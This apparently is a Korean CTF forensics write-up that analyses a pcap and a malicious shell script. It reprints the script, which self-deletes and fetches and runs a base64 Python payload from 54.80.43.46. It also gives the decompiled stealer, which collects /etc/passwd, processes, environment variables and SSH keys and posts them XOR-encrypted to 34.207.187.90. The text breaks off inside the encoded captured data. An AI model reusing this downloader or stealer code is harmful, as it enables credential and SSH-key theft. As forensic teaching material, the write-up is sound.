pcap 파일과 쉘스크립트 파일 하나를 준다.
#!/bin/bash
rm -f "${BASH_SOURCE[0]}"
which python3 >/dev/null
if [[ $? -ne 0 ]]; then
exit
fi
which curl >/dev/null
if [[ $? -ne 0 ]]; then
exit
fi
mac_addr=$(ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}')
curl 54.80.43.46/images/banner.png?cache=$(base64 <<< $mac_addr) -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 2>/dev/null | base64 -d > /tmp/.cacheimg
python3 /tmp/.cacheimg
rm -f /tmp/.cacheimg54.80.43.46 패킷을 봐야겠따.
ip.src == 54.80.43.46 필터를 통해 패킷을 필터링한다.
패킷 우클릭 - Follow - TCP Stream을 본다.
mal.sh 분석을 통해 cache는 base64(맥), Response data는 base64 인코딩 된 값임을 알 수 있다.
import base64
a = 'Mw0NCvPFT2FUCwAA4wAAAAAAAAAAAAAAAAkAAABAAAAAc6QAAABkAGQBbABaAGQAZAFsAVoBZABkAWwCWgJkAGQBbANaBGQAZAFsBVoFZABkAWwGWgZkAGQBbAdaB2QAZAFsCFoIZABkAWwJWglkAGQBbApaCmQCZAOEAFoLZARkBYQAWgxkBmQHhABaDWQIZAmEAFoOZApkC4QAWg9kDGQNhABaEGQOZA+EAFoReQplEYMAAQBXAG4MAQABAAEAWQBuAlgAZAFTACkQ6QAAAABOYwAAAAAAAAAACQAAAAoAAABDAAAAc+YAAAB0AGoAdABqAXQAagKDAn0AdANqA2QBZAJkAxQAgwJ9AXQEagVkBHQGagd8AGoIgwBkBXQEaglkBGQDfAFqCoMAZAYZAIMDgwODAmQGGQB9AnwBaguDAH0DZwB9BHiEdAxkBnwCZAeDA0QAXXR9BXwDfAV8BWQIFwCFAhkAag1kAmQJgwJkBhkAfQZ8BmoOgwB9BnwDfAVkChcAfAVkCxcAhQIZAH0HfAdkBhkAmwBkDHwHZAkZAJsAZAx8B2QNGQCbAGQMfAdkDhkAmwCdB30IfARqD3wGfAhmAoMBAQBxalcAfARTACkPTtoBQvMBAAAAAGkAEAAAWgJpTGkSiQAAcgEAAADpKAAAAOkQAAAA6QEAAADpFAAAAOkYAAAA2gEu6QIAAADpAwAAACkQ2gZzb2NrZXTaB0FGX0lORVTaClNPQ0tfREdSQU3aBWFycmF52gZzdHJ1Y3TaBnVucGFja9oFZmNudGxaBWlvY3Rs2gZmaWxlbm/aBHBhY2vaC2J1ZmZlcl9pbmZv2gd0b2J5dGVz2gVyYW5nZdoFc3BsaXTaBmRlY29kZdoGYXBwZW5kKQnaAXPaAWfaAXnaAW7aAWHaAWnaAWPaAW3aAXapAHIkAAAA+hAvdG1wL3RtcGFsaWlkZWo12gxnZXRfbmV0X2luZm8NAAAAcyAAAAAAARABEAIKAQYBAgEYAQYCCAMEARIBHAEIARQBKgESAXImAAAAYwAAAAAAAAAABQAAAA4AAABDAAAAc5gAAAB0AGQBZAKDAo8YfQBkA2QEhAB8AGoBgwBEAIMBfQFXAGQAUQBSAFgAZwB9AnhmfAFEAF1efQN8A2oCZAWDAX0EdAN8BGQGGQCDAWQHawBzYHQDfARkBhkAgwFkCGsEcm58BGQJGQBkCmsDcm5xMnwCagR8BGQGGQB8BGQJGQB8BGQLGQB8BGQMGQBmBIMBAQBxMlcAfAJTACkNTnoLL2V0Yy9wYXNzd2TaAXJjAQAAAAAAAAACAAAAAwAAAFMAAABzFAAAAGcAfABdDH0BfAFqAIMAkQJxBFMAciQAAAApAdoFc3RyaXApAtoCLjDaAXhyJAAAAHIkAAAAciUAAAD6CjxsaXN0Y29tcD4lAAAAcwIAAAAGAHodZ2V0X3VzZXJzLjxsb2NhbHM+LjxsaXN0Y29tcD76ATpyCgAAAGnoAwAAaej9AAByAQAAANoEcm9vdOkFAAAA6QYAAAApBdoEb3BlbtoJcmVhZGxpbmVzchgAAADaA2ludHIaAAAAKQXaAWZyKgAAAHIcAAAA2gF6ch8AAAByJAAAAHIkAAAAciUAAADaCWdldF91c2VycyMAAABzEgAAAAABDAEcAwQBCgEKASwBAgImAXI1AAAAYwAAAAAAAAAABgAAABIAAABDAAAAc5QAAABnAH0AdABqAWQBgwF9AXiAfAFEAF14fQJ5ZHQCfAKDAQEAdABqA2QCfAKbAGQDnQODAX0DdARkAnwCmwBkBJ0DZAWDAo8efQRkBmoFfARqBoMAagdkB4MBgwFqCIMAfQVXAGQAUQBSAFgAfABqCXwCfAN8BWYDgwEBAFcAcRQBAAEAAQB3FFkAcRRYAHEUVwB8AFMAKQhOegUvcHJvY3oGL3Byb2MvegQvZXhleggvY21kbGluZdoCcmLzAQAAACByAwAAACkK2gJvc9oHbGlzdGRpcnIyAAAA2ghyZWFkbGlua3IwAAAA2gRqb2lu2gRyZWFkchgAAAByGQAAAHIaAAAAKQZyHgAAAHIfAAAA2gFicioAAAByMwAAAHIbAAAAciQAAAByJAAAAHIlAAAA2ghnZXRfcHJvYzEAAABzGAAAAAACBAIKAQoBAgIIAxIDFAEiAhQBBgEMAnI+AAAAYwEAAAAAAAAABQAAABcAAABDAAAAc3wAAABnAH0BeWZ0AGoBfABkARcAgwF9AnhSfAJEAF1KfQN5NnQCfACbAGQCfAObAJ0DZAODAo8YfQR8AWoDfAN8BGoEgwBmAoMBAQBXAGQAUQBSAFgAVwBxGgEAAQABAHcaWQBxGlgAcRpXAFcAbgwBAAEAAQBZAG4CWAB8AVMAKQROegUvLnNzaHoGLy5zc2gvcicAAAApBXI4AAAAcjkAAAByMAAAAHIaAAAAcjwAAAApBdoBdXIbAAAAcioAAAByHQAAAHIzAAAAciQAAAByJAAAAHIlAAAA2gdnZXRfc3NoSQAAAHMYAAAAAAIEAgIBDgIKAQIBFgEgAQYBEAEGAQYCckAAAABjBAAAAAAAAAAGAAAABQAAAEMAAABzYAAAAGkAfQR8AHwEZAE8AHwCfARkAjwAdAB0AWoCgwF8BGQDPABnAHwEZAQ8AHgwdAN0BHwBgwGDAUQAXSB9BXwEZAQZAGoFfAF8BRkAfAN8BRkAZAWcAoMBAQBxOFcAfARTACkGTtoDbmV02gRwcm9j2gNlbnbaBHVzZXIpAtoEaW5mb9oDc3NoKQbaBGRpY3RyOAAAANoHZW52aXJvbnIXAAAA2gNsZW5yGgAAACkGckEAAAByRAAAAHJCAAAAckYAAADaA291dHIgAAAAciQAAAByJAAAAHIlAAAA2gxidWlsZF9vdXRwdXRbAAAAcxAAAAAAAQQBCAEIAQ4CCAESASACcksAAABjAQAAAAAAAAAEAAAABQAAAAMAAABzXgAAAHQAagFqAmQBgwF9AXQDagR8AIMBagWDAIkBZAKJAHQGhwCHAWYCZANkBIQIdAd0CIgBgwGDAUQAgwGDAX0CfAFqCWQFZAZ0CmoLfAKDAYMDAQB8AWoMgwB9A2QAUwApB056DTM0LjIwNy4xODcuOTBzBwAAADg2NzUzMDljAQAAAAAAAAACAAAABwAAABMAAABzJAAAAGcAfABdHH0BiAF8ARkAiAB8AXQAiACDARYAGQBBAJECcQRTAHIkAAAAKQFySQAAACkCcikAAAByIAAAACkC2gFr2gFwciQAAAByJQAAAHIrAAAAbAAAAHMCAAAABgB6GHNlbmQuPGxvY2Fscz4uPGxpc3Rjb21wPtoEUE9TVHoHL3VwbG9hZCkN2gRodHRw2gZjbGllbnTaDkhUVFBDb25uZWN0aW9u2gRqc29u2gVkdW1wc9oGZW5jb2Rl2gVieXRlc3IXAAAAckkAAADaB3JlcXVlc3TaBmJhc2U2NNoJYjY0ZW5jb2Rl2gtnZXRyZXNwb25zZSkE2gRkYXRhciEAAADaAWRyKgAAAHIkAAAAKQJyTAAAAHJNAAAAciUAAADaBHNlbmRnAAAAcwwAAAAAAQwCDgEEASACFAFyXAAAAGMAAAAAAAAAAAgAAAAFAAAAQwAAAHN6AAAAZAFqAHQBagJkAmQDdANqBIMAFgCDAoMBfQBkBHwAawNyJmQAUwB0BYMAfQF0BoMAfQJ0B4MAfQNnAH0EeCJ8AkQAXRpcBH0FfQV9Bn0FfARqCHQJfAaDAYMBAQBxQlcAdAp8AXwCfAN8BIMEfQd0C3wHgwEBAGQAUwApBU5yLAAAAHoCLi56BSUwMTJ4ehE0YjplMTpkNjphODo2NjpiZSkMcjsAAADaAnJl2gdmaW5kYWxs2gR1dWlk2gdnZXRub2RlciYAAAByNQAAAHI+AAAAchoAAAByQAAAAHJLAAAAclwAAAApCNoDa2V5ckEAAAByRAAAAHJCAAAAckYAAADaAV9yHwAAAHJaAAAAciQAAAByJAAAAHIlAAAAch8AAAByAAAAcxYAAAAAAhoBCAEEAgYBBgEGAgQBEgESAg4Cch8AAAApEnIPAAAAclcAAAByEgAAANoLaHR0cC5jbGllbnRyTwAAAHJSAAAAcl0AAAByDAAAAHIQAAAAcjgAAAByXwAAAHImAAAAcjUAAAByPgAAAHJAAAAAcksAAAByXAAAAHIfAAAAciQAAAByJAAAAHIkAAAAciUAAADaCDxtb2R1bGU+AQAAAHMoAAAACAEIAQgBCAEIAQgBCAEIAQgBCAMIFggOCBgIEggMCAsIEgIBCgEGAQ=='
a = base64.b64decode(a)
f = open('./cache','wb')
f.write(a)
f.close()
mal.sh 에서 python3로 실행시키는 것과 파일 내용으로 pyc 파일임을 유추할 수 있다.
uncompyle6을 통해 py로 디컴파일해준다.
# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.7.5 (tags/v3.7.5:5c02a39a0b, Oct 15 2019, 00:11:34) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: /tmp/tmpaliidej5
# Compiled at: 2021-09-26 09:59:31
# Size of source mod 2**32: 2900 bytes
import array, base64, fcntl, http.client, json, re, socket, struct, os, uuid
def get_net_info():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
g = array.array('B', b'\x00' * 4096)
y = struct.unpack('iL', fcntl.ioctl(s.fileno(), 35090, struct.pack('iL', 4096, g.buffer_info()[0])))[0]
n = g.tobytes()
a = []
for i in range(0, y, 40):
c = n[i:i + 16].split(b'\x00', 1)[0]
c = c.decode()
m = n[i + 20:i + 24]
v = f"{m[0]}.{m[1]}.{m[2]}.{m[3]}"
a.append((c, v))
return a
def get_users():
with open('/etc/passwd', 'r') as (f):
x = [x.strip() for x in f.readlines()]
g = []
for z in x:
a = z.split(':')
if int(a[2]) < 1000 or int(a[2]) > 65000:
if a[0] != 'root':
continue
g.append((a[2], a[0], a[5], a[6]))
return g
def get_proc():
n = []
a = os.listdir('/proc')
for b in a:
try:
int(b)
x = os.readlink(f"/proc/{b}/exe")
with open(f"/proc/{b}/cmdline", 'rb') as (f):
s = (b' ').join(f.read().split(b'\x00')).decode()
n.append((b, x, s))
except:
continue
return n
def get_ssh(u):
s = []
try:
x = os.listdir(u + '/.ssh')
for y in x:
try:
with open(f"{u}/.ssh/{y}", 'r') as (f):
s.append((y, f.read()))
except:
continue
except:
pass
return s
def build_output(net, user, proc, ssh):
out = {}
out['net'] = net
out['proc'] = proc
out['env'] = dict(os.environ)
out['user'] = []
for i in range(len(user)):
out['user'].append({'info':user[i], 'ssh':ssh[i]})
return out
def send(data):
c = http.client.HTTPConnection('34.207.187.90')
p = json.dumps(data).encode()
k = b'8675309'
d = bytes([p[i] ^ k[(i % len(k))] for i in range(len(p))])
c.request('POST', '/upload', base64.b64encode(d))
x = c.getresponse()
def a():
key = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
if '4b:e1:d6:a8:66:be' != key:
return
net = get_net_info()
user = get_users()
proc = get_proc()
ssh = []
for _, _, a, _ in user:
ssh.append(get_ssh(a))
data = build_output(net, user, proc, ssh)
send(data)
try:
a()
except:
pass
# okay decompiling cache.pycsend 함수를 보면 k로 xor 해준 뒤 리퀘스트를 보낸다.
이번엔 패킷에서 34.207.187.90을 필터링해보자.
base64(data ^ k) 이니 b64decode 후 xor 해주면 plain data를 얻을 수 있을 것 닽다.
import base64
payload = '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